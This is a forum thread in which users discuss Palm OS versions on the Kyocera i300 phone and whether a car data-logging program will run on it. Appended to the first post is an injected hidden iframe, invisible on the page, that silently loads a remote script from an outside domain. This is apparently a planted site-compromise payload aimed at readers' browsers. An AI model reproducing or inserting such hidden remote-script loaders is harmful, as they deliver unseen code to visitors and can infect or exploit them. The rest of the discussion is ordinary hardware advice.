+ Reply to Thread
    T0M

what v. palmos does the i300 work on?

I want to use it to run a data-logging program designed for my car.
    the software was designed for an m105 and supposedly works with most palm pda's but I wasn't sure if the i300 could handle it.

here is a link

what do you guys think?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    the i300 uses 3.5.1 so it is compatible with this software in those terms.

if the program will work properly on the i300 is another question... they made this software for the m series palm and not all palm programs will work 100% on a palmphone device.. so caveat emptor....

T0M
    Originally posted by Marctronixx
    the i300 uses 3.5.1 so it is compatible with this software in those terms.

if the program will work properly on the i300 is another question... they made this software for the m series palm and not all palm programs will work 100% on a palmphone device.. so caveat emptor....
    This may be a dumb question, but how similar are the motherboards?(for lack of a better word)
    I dont use it as a phone anymore, is there anyway I can load standard palm os on it to use it soley as a pda?

Administrator
    i understand what you are saying..

actually, i do believe the i300 runs OS 3.5.2 and the i330 runs OS 3.5.3, so my apologies for the misinformation...

you cant update the OS on the phone. i would go ahead and load it onto the phone.. it will most likely work. my post was only to inform that not all 3rd party palm programs will work on the palmphone hybrids.

sprint pcs beta tester macmetal666's Avatar
    i have 3.5.3 on all of my i300's. one of the techs somehow got it to run and now i even have it beamable to other units,(like when i go to comp usa or talk to some customer with out it etc....)

i have gotten to run 4.1 on an i300 and an i330 BUT, KISS THE PHONE PLATFORM GOOD BYE!!!!!!! IT WILL NEVER WORK AGAIN.
    the palm has worked fine but has major limitations that just werent woth the upgrade

your program should work fine AS LONG AS ITS WITHIN THE LIMITATIONS OF THE I300!
    my i500 is more obsolete than your ti-99 or apple IIe

T0M
    Originally posted by macmetal666
    i have 3.5.3 on all of my i300's. one of the techs somehow got it to run and now i even have it beamable to other units,(like when i go to comp usa or talk to some customer with out it etc....)

i have gotten to run 4.1 on an i300 and an i330 BUT, KISS THE PHONE PLATFORM GOOD BYE!!!!!!! IT WILL NEVER WORK AGAIN.
    the palm has worked fine but has major limitations that just werent woth the upgrade

your program should work fine AS LONG AS ITS WITHIN THE LIMITATIONS OF THE I300!
    are you saying I can load a standard palm os on it?
    I dont care about the phone features so I dont mind losing them

Administrator
    t0m,

just stick with what you have.. the os on the i300 should do you just fine... dont go thru the hassle of trying to get a newer version that could render the phone unusable....

sprint pcs beta tester macmetal666's Avatar
    do some people actually READ THE POSTS?

(i havent figured out how to do the quote thing yet....)

but i did say:" THE PALM HAS WORKED FINE BUT HAS HAD MAJOR LIMITATIONS AND WERNT WORTH THE UPGRADE"

does this make sense to anyone other than me and marc? good!

the 4.1 upgrade took away some already precious memmory space from the i300, also it still cannot do things like some of the tungsen t's, sony clies, and palm zire(new one) can do.(audio/video/graphics related stuff) and keep in mind also.....its still an i300..........and keep in mind that 3k memmory loss........and etc........

SCANNERS::::::READ THIS POST!!!!!!!!!!!
    my i500 is more obsolete than your ti-99 or apple IIe